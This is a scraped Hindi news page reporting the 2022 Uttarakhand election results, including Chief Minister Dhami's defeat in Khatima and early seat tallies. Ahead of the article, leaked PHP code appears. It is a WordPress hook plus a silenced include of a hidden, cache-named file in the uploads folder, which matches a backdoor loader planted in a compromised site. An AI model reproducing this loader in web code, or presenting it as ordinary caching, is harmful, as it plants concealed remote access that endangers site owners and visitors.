add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Uttarakhand Election Results 2022: भाजपा जीत की ओर पर मुख्यमंत्री धामी को करना पड़ा हार का सामना – SOCH INDIA
Menu

Uttarakhand Election Results 2022: भाजपा जीत की ओर पर मुख्यमंत्री धामी को करना पड़ा हार का सामना

nobanner

विस्तार

सुबह एक घंटे के रुझान के अनुसार भाजपा और कांग्रेस में कांटे की टक्कर दिखाई दे रही थी, लेकिन धीरे-धीरे चुनाव परिणाम सामने आए तो भाजपा अपनी सत्ता बरकरार रखने में कामयाब होती नजर आई। उत्तराखंड में भाजपाभाजपा की 48 सीटों पर बढ़त कायम किए हुए है, लेकिन उत्तराखंड में भाजपा का बड़ा झटका लगा है। सीएम पुष्कर सिंह धामी खटीमा सीट से चुनाव हार गए हैं।

कांग्रेस के प्रदेश कार्यकारी अध्यक्ष भुवन कापड़ी ने सीएम पुष्कर धामी को दी करारी शिकस्त दी। खटीमा विधानसभा क्षेत्र के अंतिम 10 में राउंड की मतगणना पूरी हो गई है। कांग्रेस के प्रदेश कार्यकारी अध्यक्ष भुवन चंद कापड़ी ने भाजपा के मुख्यमंत्री पुष्कर सिंह धामी को 6951 मतों से करारी शिकस्त दी। कुल 91325 मतों में से पुष्कर सिंह धामी को 40675 एवं कांग्रेस के भुवन कापड़ी को 47626 वोट मिले। वहीं पूर्व मुख्यमंत्री हरीश रावत लालकुआं सीट पर चुनाव हार गए हैं।

पहले राउंड में रुद्रपुर विधानसभा सीट पर भाजपा प्रत्याशी शिव अरोड़ा को मिले करीब 2500 वोट, कांग्रेस प्रत्याशी मीना शर्मा को करीब 2000 वोट। भाजपा प्रत्याशी आगे।
देहरादून की चकराता शाहपुर धरमपुर विधानसभा में कांग्रेस प्रत्याशियों को फिलहाल पहले चरण में बढ़त। वहीं विकास नगर रायपुर राजपुर कैंट मसूरी जैसी सीटों पर भाजपा प्रत्याशी आगे है।
खानपुर सीट से निर्दलीय प्रत्याशी उमेश कुमार करीब तीन हजार वोटों से आगे चल रहे हैं। उन्हें 4530 वोट अभी तक प्राप्त हुए हैं। वहीं बसपा के रविंद्र पनियाला दूसरे स्थान पर रहकर 1566 वोट और भाजपा की रानी देवयानी 1322 वोट लेकर तीसरे स्थान पर हैं